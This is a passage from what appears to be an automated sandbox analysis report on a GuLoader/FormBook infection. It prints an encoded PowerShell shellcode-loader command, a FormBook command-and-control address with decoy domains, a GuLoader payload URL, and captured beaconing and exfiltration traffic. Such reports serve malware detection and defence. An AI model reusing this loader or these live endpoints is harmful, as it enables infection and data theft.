QBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAAUgBhAHMAawBvADgAMAAsAHUAaQBuAHQAIABSAGEAcwBrAG8AOAAxACwASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAAyACwAcgBlAGYAIABJAG4AdAAzADIAIABSAGEAcwBrAG8AOAAzACwAaQBuAHQAIABSAGEAcwBrAG8AOAA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAA1ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA2ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA3ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA4ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEgA
      Source: Process startedAuthor: frack113: Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBBAEkAUgBFAEQAIABTAGUAbgBnAGUAbABlAGoAIABWAGUAbgBkAGUAdABhADgAIABUAEUASQBTAFQARQAgAEYAbwBlAGwAZQBsAHMAZQBzAG0AOQAgAGEAbgB0AGkAdAB5AHIAbwAgAFQASQBMAFMAIABCAEwARwBGAFIAVQAgAEIAeQBkAGUAZgA1ACAATQBpAGwAaQA1ACAAQQBwAHAAbwBzACAAcwBvAGYAdABmAG8AbgB0AGUAdAAgAGEAbABrAG8AIABuAG8AbgBtAGEAcgBrAGUAdAAgAE0AbwBkAGkAcwAgAE0AbwBpAHMAIABVAG4AdgBlAGkAbABlAGQAIABVAG4AZQBtAGEAYwAgAGcAYQByAGIAbABlAHMAZgAgAHQAZQBlAG4AYQAgAFMASABVAFQAVABMAEUAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAE8AZgBhAHkAdgBlADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABPAGYAYQB5AHYAZQA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAHcAYQB0ADkALABpAG4AdAAgAFIAYQBzAGsAbwA4ACwAcgBlAGYAIABJAG4AdAAzADIAIABPAGYAYQB5AHYAZQAsAGkAbgB0ACAATQBlAHQAegBlAHIAZQBzAHAAZQA5ACwAaQBuAHQAIABPAGYAYQB5AHYAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEIAVQBUAFQARQBSAE0AQQAsAHUAaQBuAHQAIABDAG8AbgB0AHIAYQA2ACwAaQBuAHQAIAB1AG4AZAB2AHIAcABpAGUAdABpACwAaQBuAHQAIABPAGYAYQB5AHYAZQAwACwAaQBuAHQAIABGAG8AbABkAHkAcwB5ADcALABpAG4AdAAgAE8AYgBvAGUAcgA4ACwAaQBuAHQAIABCAEwAVQBGAEYAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAAUgBhAHMAawBvADgAMAAsAHUAaQBuAHQAIABSAGEAcwBrAG8AOAAxACwASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAAyACwAcgBlAGYAIABJAG4AdAAzADIAIABSAGEAcwBrAG8AOAAzACwAaQBuAHQAIABSAGEAcwBrAG8AOAA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAA1ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA2ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA3ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA4ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEgAdQB0AHUANwAgAGcAYQByAGEAbgAgAGQAeQBzAGMAaAAgAFUATgBVAE4ASQAgAFMAdABvAHIAIABPAFYARQBSAEkATgAgAGwAaQBmAHQAbQBhACAARQBsAGUAYwB0AHIAbwBkAGkAIABJAHIAcgBpAHQAZQByAGUAdAA0ACAAQgBvAG4AaQBuAGkAdABlADcAIABlAGMAZAB5AHMAbwBuAGEAbgAgAHMAaABhAHIAIABLAGEAcgBhAG4AdABuAGUAcwB0ACAAYgByAHUAdAB0AG8AIABhAG4AdAByAGEAYwBpACAARgB5AHIAbQBlACAATABhAHUAZAByAHUAcAB0AHIAaQA2ACAAZABlAHMAcABvAHQAaQB6ACAAVABlAG0AcABlAGwAawAgAFIAZQB0AHMAcwBpAGsAIABkAGUAbQBvAHUAZABnAGEAdgBlACAAVABBAEMAVABVACAATwBiAGoAdQAgAEwAVQBEAEkAQwBSAE8AVQBTAEMAIABzAHQAdQBtACAAVQBuAHAAbAAgAE8AdQB0AHMAaABvADgAIABuAG8AbgBwA
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: C:\Program Files (x86)\internet explorer\ieinstal.exe\1, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 3440, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBBAEkAUgBFAEQAIABTAGUAbgBnAGUAbABlAGoAIABWAGUAbgBkAGUAdABhADgAIABUAEUASQBTAFQARQAgAEYAbwBlAGwAZQBsAHMAZQBzAG0AOQAgAGEAbgB0AGkAdAB5AHIAbwAgAFQASQBMAFMAIABCAEwARwBGAFIAVQAgAEIAeQBkAGUAZgA1ACAATQBpAGwAaQA1ACAAQQBwAHAAbwBzACAAcwBvAGYAdABmAG8AbgB0AGUAdAAgAGEAbABrAG8AIABuAG8AbgBtAGEAcgBrAGUAdAAgAE0AbwBkAGkAcwAgAE0AbwBpAHMAIABVAG4AdgBlAGkAbABlAGQAIABVAG4AZQBtAGEAYwAgAGcAYQByAGIAbABlAHMAZgAgAHQAZQBlAG4AYQAgAFMASABVAFQAVABMAEUAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAE8AZgBhAHkAdgBlADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABPAGYAYQB5AHYAZQA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAHcAYQB0ADkALABpAG4AdAAgAFIAYQBzAGsAbwA4ACwAcgBlAGYAIABJAG4AdAAzADIAIABPAGYAYQB5AHYAZQAsAGkAbgB0ACAATQBlAHQAegBlAHIAZQBzAHAAZQA5ACwAaQBuAHQAIABPAGYAYQB5AHYAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEIAVQBUAFQARQBSAE0AQQAsAHUAaQBuAHQAIABDAG8AbgB0AHIAYQA2ACwAaQBuAHQAIAB1AG4AZAB2AHIAcABpAGUAdABpACwAaQBuAHQAIABPAGYAYQB5AHYAZQAwACwAaQBuAHQAIABGAG8AbABkAHkAcwB5ADcALABpAG4AdAAgAE8AYgBvAGUAcgA4ACwAaQBuAHQAIABCAEwAVQBGAEYAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAAUgBhAHMAawBvADgAMAAsAHUAaQBuAHQAIABSAGEAcwBrAG8AOAAxACwASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAAyACwAcgBlAGYAIABJAG4AdAAzADIAIABSAGEAcwBrAG8AOAAzACwAaQBuAHQAIABSAGEAcwBrAG8AOAA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAA1ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA2ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA3ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA4ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEgAdQB0AHUANwAgAGcAYQByAGEAbgAgAGQAeQBzAGMAaAAgAFUATgBVAE4ASQAgAFMAdABvAHIAIABPAFYARQBSAEkATgAgAGwAaQBmAHQAbQBhACAARQBsAGUAYwB0AHIAbwBkAGkAIABJAHIAcgBpAHQAZQByAGUAdAA0ACAAQgBvAG4AaQBuAGkAdABlADcAIABlAGMAZAB5AHMAbwBuAGEAbgAgAHMAaABhAHIAIABLAGEAcgBhAG4AdABuAGUAcwB0ACAAYgByAHUAdAB0AG8AIABhAG4AdAByAGEAYwBpACAARgB5AHIAbQBlACAATABhAHUAZAByAHUAcAB0AHIAaQA2ACAAZABlAHMAcABvAHQAaQB6ACAAVABlAG0AcABlAGwAawAgAFIAZQB0AHMAcwBpAGsAIABkAGUAbQBvAHUAZABnAGEAdgBlACAAVABBAEMAVABVACAATwBiAGoAdQAgAEwAVQBEAEkAQwBSAE8AVQBTAEMAIABzAHQAdQBtACAAVQBuAHAAbAAgAE8AdQB0AHMAaABvADgAIABuAG8AbgBwA
      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6944, TargetFilename: C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.cmdline
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 348
      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132875415130336605.6944.DefaultAppDomain.powershell

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Found malware configuration
      Source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.usyeslogistics.com/k6sm/"], "decoy": ["mingshengjewelry.com", "ontimecleaningenterprise.com", "alyssa0.xyz", "ptecex.xyz", "dukfot.online", "pvcpc.com", "iowalawtechnology.com", "nestletranspotation.com", "mysithomes.com", "greenlakespaseattle.com", "evofishingsystems.com", "unilytcs.com", "ordemt.com", "dentalbatonrouge.com", "pictureme360.net", "chalinaslacatalana.com", "newmirrorimage.xyz", "pinklaceandlemonade.com", "rapinantes.com", "yzicpa.com", "josephosman.com", "robsarra.com", "shumgroup.net", "flooringnewhampshire.com", "onceadayman.com", "audiomacklaunch.xyz", "hurryburry.com", "golfvid.info", "tutortenbobemail.com", "tatlitelasorganizasyon.com", "tqgtdd.space", "classicalruns.com", "xx3tgnf.xyz", "galwayartanddesign.com", "qidu.press", "crypto-obmennik.com", "dn360rn001.com", "tridim.tech", "phamhome.com", "mediadollskill.com", "loveatmetaverse.com", "electric4x4parts.com", "azulymargarita.com", "isadoramel.com", "rubyclean.com", "officiallydanellewright.com", "wu8d349s67op.xyz", "detetivepyther.com", "wondubniumgy463.xyz", "registry-finance3.com", "ultracoding.com", "open-4business.com", "supremelt.online", "pangfeng.xyz", "morneview.com", "northfloridapsychic.com", "kg4bppuh.xyz", "friv.asia", "epsilonhomecare.com", "hbina.com", "beachhutprinting.com", "sophoscloudoptix.net", "managemarksol.site", "palestyna24.info"]}
      Source: 00000017.00000000.621139519.0000000002CD0000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://www.bulkwhatsappsender.in/bin_FlDFmmV154.bin1"}
      Yara detected FormBook
      Source: Yara matchFile source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: unknownHTTPS traffic detected: 151.106.117.33:443 -> 192.168.2.6:49820 version: TLS 1.2
      Source: Binary string: ieinstal.pdbGCTL source: svchost.exe, 0000001A.00000002.875332208.000000000392F000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 0000001A.00000002.874340657.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: ieinstal.pdb source: svchost.exe, 0000001A.00000002.875332208.000000000392F000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 0000001A.00000002.874340657.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.731672310.0000000003200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.729304161.0000000003000000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000001A.00000003.731672310.0000000003200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.729304161.0000000003000000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: svchost.pdb source: ieinstal.exe, 00000017.00000003.728221731.0000000002F07000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.741936624.000000001EAA0000.00000040.10000000.00040000.00000000.sdmp, ieinstal.exe, 00000017.00000003.728303049.0000000002EC3000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: svchost.pdbUGP source: ieinstal.exe, 00000017.00000003.728221731.0000000002F07000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.741936624.000000001EAA0000.00000040.10000000.00040000.00000000.sdmp, ieinstal.exe, 00000017.00000003.728303049.0000000002EC3000.00000004.00000020.00020000.00000000.sdmp

      Networking

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeDomain query: www.dentalbatonrouge.com
      Source: C:\Windows\explorer.exeDomain query: www.yzicpa.com
      Source: C:\Windows\explorer.exeNetwork Connect: 108.175.14.116 80Jump to behavior
      Potential malicious VBS script found (has network functionality)
      Source: Initial file: BinaryStream.SaveToFile NONN, 2
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: www.usyeslogistics.com/k6sm/
      Source: Malware configuration extractorURLs: https://www.bulkwhatsappsender.in/bin_FlDFmmV154.bin1
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /k6sm/?d48pAVX=VId1XGgV51+banGxzL0dUPYEUmU95ttpJOMZNiN8gg3/S9FPXBDAGWpY0ehao+dqxo0M4PI93Q==&8pnDfl=Lb3tdB30pX2 HTTP/1.1Host: www.dentalbatonrouge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /bin_FlDFmmV154.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.bulkwhatsappsender.inCache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /k6sm/ HTTP/1.1Host: www.dentalbatonrouge.comConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.dentalbatonrouge.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dentalbatonrouge.com/k6sm/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 34 38 70 41 56 58 3d 64 71 52 50 4a 68 70 75 38 57 57 61 4c 41 58 66 67 76 45 42 4c 5a 74 69 62 45 49 77 30 4d 42 38 58 62 42 42 51 69 46 6c 68 53 54 6b 57 4d 68 48 64 55 79 71 4a 68 6f 45 71 75 46 6d 70 4f 4e 55 33 6f 45 50 31 2d 4d 61 75 43 4b 6e 57 6f 49 69 66 72 70 31 6c 59 47 4a 39 30 28 5f 61 62 70 6a 35 65 61 4b 44 43 30 59 30 43 28 37 6a 32 35 4f 4a 7a 49 49 68 76 65 61 57 38 4c 48 77 47 31 6f 58 57 51 76 62 35 61 51 49 4f 76 37 4c 6c 79 37 34 61 68 30 32 71 43 32 70 4b 72 67 4c 61 55 70 78 44 73 37 72 43 31 69 39 42 34 76 58 4e 49 43 58 63 64 70 49 64 4c 4b 4d 6f 62 52 64 32 31 6b 6d 6c 30 67 78 43 6f 31 4e 5a 45 76 44 54 36 46 6d 62 35 64 70 61 42 58 77 62 30 66 42 78 78 4b 6a 39 4d 30 43 71 44 6a 6f 56 68 47 4c 7a 4b 48 68 44 34 37 64 65 42 51 76 2d 4c 4c 45 37 49 57 73 54 6a 46 6b 6c 69 2d 52 47 43 38 56 45 70 57 54 46 67 46 72 76 4f 69 65 43 50 75 4e 62 77 61 34 66 61 71 57 4e 4e 6f 36 4d 74 6f 77 57 4f 73 66 30 52 4d 6c 43 6c 34 52 67 6f 76 41 2d 6d 6f 34 44 72 42 48 6f 7e 4d 4b 4a 61 37 41 44 50 68 68 32 4f 50 6a 72 31 50 70 44 67 38 55 70 4e 57 6a 4b 73 6f 35 41 38 51 62 70 48 49 28 46 6f 4c 37 37 7e 47 70 48 30 56 49 67 73 64 4f 5f 59 77 31 51 54 4c 65 5f 54 71 43 39 76 6a 63 7a 48 75 35 76 56 4b 65 52 45 2e 00 00 00 00 00 00 00 00 Data Ascii: d48pAVX=dqRPJhpu8WWaLAXfgvEBLZtibEIw0MB8XbBBQiFlhSTkWMhHdUyqJhoEquFmpONU3oEP1-MauCKnWoIifrp1lYGJ90(_abpj5eaKDC0Y0C(7j25OJzIIhveaW8LHwG1oXWQvb5aQIOv7Lly74ah02qC2pKrgLaUpxDs7rC1i9B4vXNICXcdpIdLKMobRd21kml0gxCo1NZEvDT6Fmb5dpaBXwb0fBxxKj9M0CqDjoVhGLzKHhD47deBQv-LLE7IWsTjFkli-RGC8VEpWTFgFrvOieCPuNbwa4faqWNNo6MtowWOsf0RMlCl4RgovA-mo4DrBHo~MKJa7ADPhh2OPjr1PpDg8UpNWjKso5A8QbpHI(FoL77~GpH0VIgsdO_Yw1QTLe_TqC9vjczHu5vVKeRE.
      Source: global trafficHTTP traffic detected: POST /k6sm/ HTTP/1.1Host: www.dentalbatonrouge.comConnection: closeContent-Length: 180913Cache-Control: no-cacheOrigin: http://www.dentalbatonrouge.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dentalbatonrouge.com/k6sm/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 34 38 70 41 56 58 3d 64 71 52 50 4a 67 51 66 77 47 53 4c 4d 32 48 65 79 62 68 4e 41 36 30 39 66 48 4d 6a 77 63 35 6f 61 72 74 52 51 69 30 69 73 77 37 36 64 4d 78 48 62 52 47 74 44 68 6f 4c 73 75 46 68 7e 2d 42 46 36 66 41 48 31 38 67 38 75 44 79 6b 50 62 51 6a 66 62 70 63 6c 34 61 6c 70 45 36 36 61 5a 74 4b 34 39 32 53 57 79 77 59 74 32 54 39 28 44 64 56 4f 78 73 54 76 37 7e 6c 55 35 65 5a 7a 78 45 58 52 7a 34 5a 4e 74 43 57 44 63 7a 73 48 45 43 48 75 74 31 4e 34 65 71 39 71 4c 76 7a 47 59 77 74 77 77 31 59 32 7a 30 51 33 52 67 78 42 61 6b 4b 64 4e 4a 41 62 64 36 35 4d 6f 6a 42 55 6c 51 69 69 6d 51 65 7a 54 55 50 59 34 77 68 64 77 44 41 69 59 42 67 36 4a 49 50 76 75 49 50 46 67 4d 49 69 5f 6b 6b 59 2d 4f 56 71 42 78 38 66 79 36 37 6a 55 59 7a 41 4f 78 76 68 64 72 63 4b 49 41 65 70 52 50 5a 71 6c 69 64 54 47 44 39 66 6e 68 75 59 30 6b 61 7e 66 28 44 65 46 54 2d 58 62 63 42 35 5a 53 45 4c 35 46 6c 32 63 78 6b 37 7a 6a 4d 4a 7a 68 48 69 68 34 54 62 41 70 67 64 73 7e 5f 34 44 71 2d 48 70 7e 71 4d 34 7e 37 44 79 76 55 78 42 79 54 68 72 31 53 76 51 49 2d 4e 72 59 62 6a 4f 34 6f 6a 53 6c 33 62 65 62 49 36 57 67 45 36 61 7e 47 6f 58 30 56 4f 67 74 38 48 4e 64 45 31 51 79 34 58 61 53 4c 54 50 6a 67 58 6b 79 64 74 50 70 65 63 55 38 65 41 73 6c 79 58 75 4c 37 7e 76 53 52 73 37 52 71 30 4c 4c 4d 41 49 65 52 7e 68 75 58 58 59 6d 77 59 48 47 69 49 73 5a 68 69 73 44 57 62 35 63 6a 4e 6b 62 4c 46 63 5a 61 73 58 6d 58 7e 6a 76 54 43 76 6d 44 35 76 65 6f 42 35 76 74 44 6a 33 37 79 54 77 31 78 75 58 2d 4e 38 6e 6d 6d 59 69 69 53 64 42 62 67 77 7a 6f 59 4a 55 50 67 45 42 4d 68 58 4c 50 77 43 67 52 36 64 64 49 4f 2d 79 56 77 38 53 2d 50 78 56 6b 44 55 48 75 31 41 34 43 67 69 35 6b 79 76 52 79 4e 50 45 4c 39 2d 78 46 7e 6a 75 4d 71 6b 6d 43 6a 75 30 43 32 56 42 46 74 47 47 56 54 5a 47 46 6c 72 54 30 70 6a 6f 56 56 73 38 58 6f 52 78 76 41 72 36 72 73 77 48 6d 75 38 6d 67 63 32 32 73 34 6b 62 41 77 55 41 75 35 69 44 4d 74 6c 55 6f 28 45 4e 48 56 42 68 77 31 44 6b 4e 47 4f 74 44 54 7a 47 71 6c 6e 63 75 39 61 4f 73 4f 58 47 4a 37 31 48 4f 63 2d 77 31 66 7a 28 72 47 59 6f 50 4e 70 34 52 38 44 48 48 6d 38 41 6e 36 34 51 64 6d 49 62 4c 75 54 76 47 59 35 63 42 54 54 4f 73 31 6b 58 37 54 30 7a 64 62 38 69 44 59 51 6f 45 7a 54 4f 31 44 6f 35 52 46 59 77 57 33 6c 48 6d 74 51 76 50 39 38 38 5f 75 69 55 43 75 69 48 4d 64 6e 47 6c 4b 77 74 51 73 46 6f 4e 39 4e 74 78 4c 34 34 6e 7a 57 28 4c 58 43 4a 72 77 77 4f 55 51 59 4e 43 78 61 4d 56 52 55 49 4a 56 6c 63 6f 48 39 70 51 57 4e 75 33 51 4e 4e 46 68 4f 30 49 66 66 46 74 55 69 59 5a 39 76 33 38 4b 79 76 76 68 33
      Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
      Source: Joe Sandbox ViewASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE
      Source: powershell.exe, 00000004.00000002.673929777.00000000081A0000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000003.661419330.0000000002ECE000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000003.659480092.0000000002ECE000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000003.661232085.0000000002ECE000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.729620511.0000000002ECE000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000003.728303049.0000000002EC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: powershell.exe, 00000004.00000002.671138016.00000000064A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000004.00000002.666875748.0000000005587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000004.00000002.666505278.0000000005441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: svchost.exe, 0000001A.00000002.874553594.0000000002EAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5e
      Source: svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
